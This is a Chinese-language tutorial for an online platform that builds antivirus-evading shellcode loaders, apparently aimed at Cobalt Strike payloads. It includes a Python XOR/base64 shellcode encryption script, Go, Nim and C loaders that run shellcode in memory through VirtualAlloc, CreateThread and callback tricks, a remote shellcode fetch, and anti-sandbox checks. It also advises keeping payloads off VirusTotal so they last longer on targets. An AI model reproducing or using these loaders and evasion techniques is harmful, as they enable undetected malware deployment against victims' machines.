Golang 免杀与AV Evasion Craft Online 在线免杀生成平台教学文档<\/h1>

1. 项目概述<\/h2>

AV Evasion Craft Online 是一个通过 Web 界面实现多人分发的免杀生成平台，主要解决以下问题：<\/p>

传统免杀项目需要手动复制 Shellcode 到源码并编译<\/li>
团队协作时环境搭建和分发问题<\/li>

重复使用同一植入物易被检测<\/li> <\/ul>

项目地址：https:\/\/github.com\/yutianqaq\/AVEvasionCraftOnline (默认密码: yutian)<\/p>

2. 程序处理流程<\/h2>

用户发送生成请求<\/strong><\/li>
Shellcode 转换<\/strong>：编码、加密、压缩<\/li>

工作目录初始化<\/strong>：

生成唯一 UUID 命名工作目录<\/li>
复制原始模板代码到工作目录<\/li> <\/ul> <\/li>
模板预处理<\/strong>：

生成随机函数名称<\/li>
填充转换后的 Shellcode<\/li>
填充解密 Key<\/li> <\/ul> <\/li>
编译<\/strong>：根据选择的模板使用对应编译器<\/li>
打包返回<\/strong>：将最终结果打包为 zip 返回给用户<\/li> <\/ol>
3. 模板管理<\/h2>
3.1 目录结构<\/h3>
通过目录结构存放和管理模板，便于扩展和多样化：<\/p>
template\/ ├── go_VirtualAlloc\/ │ └── go_VirtualAlloc.go ├── nim_VirtualAlloc\/ │ └── nim_VirtualAlloc.nim └── c_VirtualAlloc\/ └── c_VirtualAlloc.c <\/code><\/pre> 3.2 服务端配置<\/h3> 使用 YAML 配置文件管理模板映射：<\/p> bypassav<\/span>: <\/span><\/span> templates-directory<\/span>: \/path\/to\/templates<\/span> <\/span><\/span> storage-directory<\/span>: \/path\/to\/downloads<\/span> <\/span><\/span> compilerwork-directory<\/span>: \/path\/to\/compiler<\/span> <\/span><\/span> templates-mapping<\/span>: <\/span><\/span> go_VirtualAlloc<\/span>: <\/span><\/span> loadMethod<\/span>: [EMBEDDED, REMOTE, LOCAL]<\/span> <\/span><\/span> transformation<\/span>: [base64Xor, xor]<\/span> <\/span><\/span> nim_VirtualAlloc<\/span>: <\/span><\/span> loadMethod<\/span>: [EMBEDDED, LOCAL]<\/span> <\/span><\/span> transformation<\/span>: [xor]<\/span> <\/span><\/span> c_VirtualAlloc<\/span>: <\/span><\/span> loadMethod<\/span>: [EMBEDDED]<\/span> <\/span><\/span> transformation<\/span>: [none]<\/span> <\/span><\/span> compiler-c<\/span>: x86_64-w64-mingw32-gcc<\/span> <\/span><\/span> compiler-nim<\/span>: nim<\/span> <\/span><\/span> compiler-golang<\/span>: go<\/span> <\/span><\/span><\/code><\/pre>4. Shellcode 处理<\/h2> 4.1 编码与加密<\/h3> 必要性<\/strong>：原始 Cobalt Strike Shellcode 有特征，易被静态检测<\/li> 熵值分析<\/strong>：原始 CS Shellcode: 7.226<\/li> 多字节异或后: 7.728<\/li> Base64编码后: 5.965 (更隐蔽但体积增大)<\/li> <\/ul> <\/li> <\/ul> 4.2 转换方法<\/h3> Base64 + 多字节异或<\/strong>：<\/p> 优点：熵值低(5.965)，不易被静态分析<\/li> 缺点：增大 Shellcode 体积<\/li> <\/ul> <\/li> 多字节异或<\/strong>：<\/p> 优点：保持熵值接近原始(7.728)<\/li> 缺点：比单字节异或更安全<\/li> <\/ul> <\/li> <\/ol> 4.3 Python 转换脚本<\/h3> import<\/span> os,<\/span> sys,<\/span> random,<\/span> string,<\/span> base64 <\/span><\/span> <\/span><\/span>def<\/span> generate_random_string<\/span>(length): <\/span><\/span> return<\/span> ''<\/span>.<\/span>join(random.<\/span>choice(string.<\/span>ascii_letters +<\/span> string.<\/span>digits) for<\/span> _ in<\/span> range(length)) <\/span><\/span> <\/span><\/span>def<\/span> xor_encrypt<\/span>(plaintext, key): <\/span><\/span> ciphertext =<\/span> bytearray() <\/span><\/span> for<\/span> i, byte in<\/span> enumerate(plaintext): <\/span><\/span> ciphertext.<\/span>append(byte ^<\/span> key[i %<\/span> len(key)]) <\/span><\/span> return<\/span> bytes(ciphertext) <\/span><\/span> <\/span><\/span>def<\/span> main<\/span>(): <\/span><\/span> with<\/span> open(sys.<\/span>argv[1<\/span>], "rb"<\/span>) as<\/span> f: <\/span><\/span> plaintext =<\/span> f.<\/span>read() <\/span><\/span> <\/span><\/span> key =<\/span> generate_random_string(10<\/span>).<\/span>encode("utf-8"<\/span>) <\/span><\/span> ciphertext =<\/span> xor_encrypt(plaintext, key) <\/span><\/span> <\/span><\/span> print(f<\/span>"Key: <\/span>{<\/span>key}<\/span>"<\/span>) <\/span><\/span> print(f<\/span>"Key Hex: <\/span>{<\/span>', '<\/span>.<\/span>join(f<\/span>'0x<\/span>{<\/span>byte:<\/span>02x<\/span>}<\/span>'<\/span> for<\/span> byte in<\/span> key)}<\/span>"<\/span>) <\/span><\/span> print(f<\/span>"Base64 ciphertext: <\/span>{<\/span>base64.<\/span>b64encode(ciphertext).<\/span>decode()}<\/span>"<\/span>) <\/span><\/span><\/code><\/pre>5. Shellcode 存储位置<\/h2> 5.1 三种存储方式<\/h3> EMBEDDED (内嵌)<\/strong>：<\/p> 直接嵌入代码中<\/li> 优点：单文件分发<\/li> 缺点：增加程序熵值<\/li> <\/ul> <\/li> LOCAL (本地分离)<\/strong>：<\/p> 从本地文件读取<\/li> 优点：降低主程序熵值<\/li> Go实现： content<\/span>, err<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("shellcode.bin"<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> REMOTE (远程分离)<\/strong>：<\/p> 从远程服务器获取<\/li> 优点：动态更新，最难检测<\/li> Go实现(使用fasthttp)： func<\/span> fetchShellcode<\/span>() []byte<\/span> { <\/span><\/span> _<\/span>, body<\/span>, _<\/span> :=<\/span> fasthttp<\/span>.Get<\/span>(nil<\/span>, "http:\/\/example.com\/shellcode"<\/span>) <\/span><\/span> return<\/span> body<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 6. 多语言实现<\/h2> 6.1 Nim 语言<\/h3> 优点：可直接嵌入C代码，增加逆向难度<\/li> 编译命令： nim c -d:minwg -d:release --app=<\/span>gui --cpu=<\/span>amd64 hello.nim <\/span><\/span><\/code><\/pre><\/li> 示例： {.emit: """ <\/span><\/span><\/span>#include <windows.h> <\/span><\/span><\/span>unsigned char payload[] = {0x90, 0x90}; <\/span><\/span><\/span>unsigned int payload_len = sizeof(payload); <\/span><\/span><\/span>int Ldrx() { <\/span><\/span><\/span> PVOID p = VirtualAlloc(0, payload_len, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE); <\/span><\/span><\/span> RtlMoveMemory(p, payload, payload_len); <\/span><\/span><\/span> VirtualProtect(p, payload_len, PAGE_EXECUTE_READ, &oldProtect); <\/span><\/span><\/span> CreateThread(0, 0, (LPTHREAD_START_ROUTINE)p, 0, 0, 0); <\/span><\/span><\/span> return 0; <\/span><\/span><\/span>} <\/span><\/span><\/span>"""<\/span>.} <\/span><\/span>proc <\/span>Ldr<\/span>(): int<\/span> {.importc: "Ldrx"<\/span>, nodecl.} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 6.2 C 语言<\/h3> 传统但有效的实现方式，体积小，性能高。<\/p> 7. Go 免杀技术<\/h2> 7.1 Shellcode 加载方式<\/h3> SyscallN<\/strong>：<\/p> func<\/span> Ldr1<\/span>(calc<\/span> []byte<\/span>) { <\/span><\/span> mKernel32<\/span>, _<\/span> :=<\/span> syscall<\/span>.LoadDLL<\/span>("kernel32.dll"<\/span>) <\/span><\/span> fVirtualAlloc<\/span>, _<\/span> :=<\/span> mKernel32<\/span>.FindProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> calc_len<\/span> :=<\/span> uintptr(len(calc<\/span>)) <\/span><\/span> Ptr1<\/span>, _<\/span>, _<\/span> :=<\/span> fVirtualAlloc<\/span>.Call<\/span>(uintptr(0<\/span>), calc_len<\/span>, windows<\/span>.MEM_COMMIT<\/span>|windows<\/span>.MEM_RESERVE<\/span>, windows<\/span>.PAGE_EXECUTE_READWRITE<\/span>) <\/span><\/span> WriteMemory<\/span>(calc<\/span>, Ptr1<\/span>) <\/span><\/span> syscall<\/span>.SyscallN<\/span>(Ptr1<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> CreateThread<\/strong>：<\/p> func<\/span> Ldr1<\/span>(calc<\/span> []byte<\/span>) { <\/span><\/span> mKernel32<\/span>, _<\/span> :=<\/span> syscall<\/span>.LoadDLL<\/span>("kernel32.dll"<\/span>) <\/span><\/span> fVirtualAlloc<\/span>, _<\/span> :=<\/span> mKernel32<\/span>.FindProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> fCreateThread<\/span>, _<\/span> :=<\/span> mKernel32<\/span>.FindProc<\/span>("CreateThread"<\/span>) <\/span><\/span> fWaitForSingleObject<\/span>, _<\/span> :=<\/span> mKernel32<\/span>.FindProc<\/span>("WaitForSingleObject"<\/span>) <\/span><\/span> <\/span><\/span> calc_len<\/span> :=<\/span> uintptr(len(calc<\/span>)) <\/span><\/span> Ptr1<\/span>, _<\/span>, _<\/span> :=<\/span> fVirtualAlloc<\/span>.Call<\/span>(uintptr(0<\/span>), calc_len<\/span>, windows<\/span>.MEM_COMMIT<\/span>|windows<\/span>.MEM_RESERVE<\/span>, windows<\/span>.PAGE_EXECUTE_READWRITE<\/span>) <\/span><\/span> WriteMemory<\/span>(calc<\/span>, Ptr1<\/span>) <\/span><\/span> TtdAddr<\/span>, _<\/span>, _<\/span> :=<\/span> fCreateThread<\/span>.Call<\/span>(0<\/span>, 0<\/span>, Ptr1<\/span>, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span> fWaitForSingleObject<\/span>.Call<\/span>(TtdAddr<\/span>, 0xFFFFFFFF<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> EnumThreadWindows<\/strong>：<\/p> func<\/span> Ldr1<\/span>(calc<\/span> []byte<\/span>) { <\/span><\/span> mKernel32<\/span>, _<\/span> :=<\/span> syscall<\/span>.LoadDLL<\/span>("kernel32.dll"<\/span>) <\/span><\/span> mUser32<\/span>, _<\/span> :=<\/span> syscall<\/span>.LoadDLL<\/span>("user32.dll"<\/span>) <\/span><\/span> <\/span><\/span> fVirtualAlloc<\/span>, _<\/span> :=<\/span> mKernel32<\/span>.FindProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> calc_len<\/span> :=<\/span> uintptr(len(calc<\/span>)) <\/span><\/span> Ptr1<\/span>, _<\/span>, _<\/span> :=<\/span> fVirtualAlloc<\/span>.Call<\/span>(uintptr(0<\/span>), calc_len<\/span>, windows<\/span>.MEM_COMMIT<\/span>|windows<\/span>.MEM_RESERVE<\/span>, windows<\/span>.PAGE_EXECUTE_READWRITE<\/span>) <\/span><\/span> WriteMemory<\/span>(calc<\/span>, Ptr1<\/span>) <\/span><\/span> fenumThreadWindows<\/span>, _<\/span> :=<\/span> mUser32<\/span>.FindProc<\/span>("EnumThreadWindows"<\/span>) <\/span><\/span> fenumThreadWindows<\/span>.Call<\/span>(0<\/span>, Ptr1<\/span>, 0<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 7.2 反沙箱技术<\/h3> 延迟加载<\/strong>：<\/p> func<\/span> Sleeeep<\/span>() { <\/span><\/span> res<\/span> :=<\/span> 1<\/span> <\/span><\/span> for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < 5<\/span>; i<\/span>++<\/span> { <\/span><\/span> number<\/span> :=<\/span> rand<\/span>.Intn<\/span>(900<\/span>) +<\/span> 100<\/span> <\/span><\/span> res<\/span> *=<\/span> number<\/span> <\/span><\/span> } <\/span><\/span> time<\/span>.Sleep<\/span>(10<\/span> *<\/span> time<\/span>.Second<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 路径检测<\/strong>：<\/p> func<\/span> main<\/span>() { <\/span><\/span> args<\/span> :=<\/span> os<\/span>.Args<\/span>[0<\/span>] <\/span><\/span> if<\/span> (args<\/span>[10<\/span>] ==<\/span> 92<\/span> &&<\/span> (args<\/span>[0<\/span>] ==<\/span> 99<\/span> ||<\/span> args<\/span>[0<\/span>] ==<\/span> 67<\/span>)) { <\/span><\/span> os<\/span>.Exit<\/span>(0<\/span>) <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 检测路径是否为 C:\随机7字符\xxx.exe<\/code> 格式<\/li> 92 = '', 99 = 'c', 67 = 'C'<\/li> <\/ul> <\/li> <\/ol> 8. 扩展模板<\/h2> 8.1 添加新模板步骤<\/h3> 复制现有模板目录并重命名<\/li> 修改代码中的加载方式<\/li> 更新 YAML 配置文件<\/li> 测试编译和功能<\/li> <\/ol> 9. 增强免杀效果的建议<\/h2> 修改编译参数<\/strong>：优化体积和特征<\/li> 增加资源<\/strong>：添加图标、版本信息等<\/li> 自签名证书<\/strong>：使用有效证书签名<\/li> 环境检测<\/strong>：只在目标环境执行检查是否加入域<\/li> 检查内存、CPU等硬件信息<\/li> 检查临时文件等环境特征<\/li> <\/ul> <\/li> <\/ol> 10. 总结<\/h2> 杀软对抗需要多层面进行：<\/p> 自定义编码\/加密（保持低熵值）<\/li> 多样化的 Shellcode 加载方式<\/li> 多语言实现增加检测难度<\/li> 有效的反沙箱和反分析机制<\/li> 环境特定化执行逻辑<\/li> <\/ol> 重要提醒<\/strong>：生成的免杀程序不要上传到沙箱或VT检测，仅在目标环境使用以延长存活时间。<\/p> 附录：参考资源<\/h2> 文件熵值分析：https:\/\/practicalsecurityanalytics.com\/file-entropy\/<\/li> 替代 Shellcode 执行方式：https:\/\/github.com\/xiecat\/AlternativeShellcodeExec-Go<\/li> Nim 语言官网：https:\/\/nim-lang.org\/<\/li> Go 语言官网：https:\/\/golang.org\/<\/li> <\/ol>